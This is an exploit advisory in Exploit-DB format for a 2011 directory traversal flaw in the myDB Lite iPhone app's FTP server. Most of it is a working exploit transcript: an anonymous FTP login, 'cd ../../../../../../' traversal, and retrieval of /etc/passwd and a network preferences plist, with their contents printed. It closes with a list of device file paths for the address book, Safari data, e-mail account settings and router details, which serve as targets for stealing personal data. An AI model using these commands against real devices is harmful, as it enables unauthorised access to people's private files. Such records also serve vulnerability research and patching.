myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal

vendor:

myDB Lite

by:

R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: myDB Lite

Affected Version From: 1.1.10

Affected Version To: 1.1.10

Patch Exists: NO

Related CWE: N/A

CPE: a:mydb_lite:mydb_lite:1.1.10

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware

2011

myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal

There is directory traversal vulnerability in the myDBLite. Exploit Testing involves connecting to the FTP server and using the 'cd ../../../../../../' command to traverse the directory structure.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8
# Version: 1.1.10
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the myDBLite.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 29161
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User  logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfig.plist
-rw-r--r--     1 mobile mobile        429 1??09 10:55 appConfigInit.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appData.plist
-rw-r--r--     1 mobile mobile        899 1??09 10:55 appDataInit.plist
-rw-r--r--     1 mobile mobile       9859 1??09 10:55 astonmartin.jpg
-rw-r--r--     1 mobile mobile         20 1??09 10:55 astonmartin.txt
-rw-r--r--     1 mobile mobile      11128 1??09 10:55 ferrari.jpg
-rw-r--r--     1 mobile mobile         74 1??09 10:55 ferrari.txt
-rw-r--r--     1 mobile mobile      32797 1??09 10:55 frey.jpg
-rw-r--r--     1 mobile mobile      17553 1??09 10:55 porsche.jpg
-rw-r--r--     1 mobile mobile        111 1??09 10:55 porsche.txt
-rw-r--r--     1 mobile mobile        422 2??24 15:20 pswd.bkup
-rw-r--r--     1 mobile mobile        422 2??24 15:21 pswd.plist
-rw-r--r--     1 mobile mobile      54378 1??09 10:55 schinznach.jpg
drwxr-xr-x    12 mobile mobile        476 1??04 14:43 secret

226 Transfer complete.
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.
ftp> cd ../../../../../../
250 CWD command successful.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.

-rwxr-xr-x    40 root admin         30 10??26 01:20 Applications
drwxrwxr-x     1 root admin         68 8??19 04:10 Developer
drwxrwxr-x    24 root admin        884 1??12 12:53 Library
drwxr-xr-x     1 root wheel        102 8??19 04:18 System
-rwxr-xr-x     7 root admin         11 2??23 19:41 User
drwxr-xr-x    59 root wheel       2074 1??13 09:52 bin
drwxr-xr-x     1 root admin         68 10??26 01:19 boot
-rw-r--r--     1 (null) (null)        638 1??25 15:30 control
drwxrwxr-x     1 root admin         68 8??03 12:41 cores
----------     1 (null) (null)          0 (null) dev
-rwxr-xr-x    25 root admin         11 8??26 05:20 etc
drwxr-xr-x     1 root admin         68 10??26 01:19 lib
drwxr-xr-x     1 root admin         68 10??26 01:19 mnt
drwxr-xr-x     2 root wheel        136 10??23 15:12 private
drwxr-xr-x    47 root wheel       1666 1??13 09:52 sbin
-rwxr-xr-x     5 root admin         15 8??26 05:20 tmp
drwxr-xr-x     9 root wheel        374 1??13 09:52 usr
-rwxr-xr-x    26 root admin         11 8??26 05:20 var

226 Transfer complete.
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.
ftp> get ../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist